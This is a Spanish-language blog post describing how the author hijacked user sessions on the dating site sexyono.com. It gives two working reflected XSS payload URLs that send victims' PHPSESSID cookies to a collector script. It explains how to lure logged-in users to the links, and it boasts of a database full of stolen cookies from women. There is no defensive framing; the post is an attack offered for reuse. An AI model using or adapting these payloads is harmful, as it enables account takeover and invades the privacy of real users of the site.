Las galletas más dulces de la red

Vengo cargado de regalos que aquellos tres mindundis a camello no les dio tiempo a repartir el otro día, que más de un overclocking les haría falta a sus transportes, para traer de Oriente, este caliente, casi ardiente y apetitoso sabor a miel.
Sabiendo que os gustó el plato hot que dejé caer anteriormente, entre cuerpo sexy y sexy, no podía faltar explotar alguna vulnerabilidad que encontré por el camino. Así que me monté un servidor Apache con MySQL y phpMyAdmin para agilizar un poco el tema de Cookies que vengo a contaros.
Paso olímpicamente de mostraros como montar los php que nos servirán para la extracción y almacenamiento de las cookies, ya que de eso tenemos documentación en Google, como para terminar el 2012 y seguir leyendo.
Así que me adentré una vez más al paradisíaco mundo de Sexyono y miré que tipo de cookies eran necesarias para hacer réplicas de la sesiones actuales. ¿Como no? Edit Cookies para Firefox, me hechó una mano en filtrar todas las pertenecientes al dominio sexyono.com.
Entre prueba y prueba el contenido de la cookie PHPSESSID, almacenaba el identificador de sesión necesario para acceder a mi cuenta, o la vuestra... ;)
Así que solo nos faltaba algún Cross Site Scripting que permitiese capturarla ¡como sí Sexyono no tuviese auditorias de seguridad!
Sí recuerdan aquella frase que indiqué en el anterior tema sobre Sexyono ¿Qué vé un usuario registrado a diferencia de uno sin registro?” Nos presta una esencial ayuda, pues la cookie de PHPSESSID, deberá de contener un usuario identificado, que si de lo contrario esto no se cumple, no conseguiremos acceso a la cuenta y perderemos infinidad de tiempo en encontrar las cookies funcionales. Así que sin más rodeos, necesitaríamos encaminar a las víctimas dentro de una zona restringida que identifique a aquellos usuarios, desde un enlace que les fuerce a iniciar sesión.
http://sexyono.com/vermensajes.php?Abierto="><script>location.href='http://localhost/cookie.php?cookie='%2Bdocument.cookie;</script>&uid=(USUARIO EN COINCIDENCIAS)
Con lo que automáticamente serán redirigidos al dominio que guardará sus cookies.
Si nos quedamos con ganas de probar más opciones, este segundo plato contiene un XSS en el dominio de forma pública.
http://sexyono.com/ampliarfoto.php?uid="><script>location.href='http://localhost/cookie.php?cookie='%2Bdocument.cookie;</script>
Además junto al UID del usuario, nos vendrá bien para ver detalladamente cual es nuestro objetivo principal.
El resultado del invento junto a mi IP pública, sería la base de datos rebosando de cookies capturadas de bonitas doncellas.
Y de postre un subdominio que no nos sirve para jugar con cookies ajenas, pero para que no se olviden de...
Saludos 4n4les! ;)